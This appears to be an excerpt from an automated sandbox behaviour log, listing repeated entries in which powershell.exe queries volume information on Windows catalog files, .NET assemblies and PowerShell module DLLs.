Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
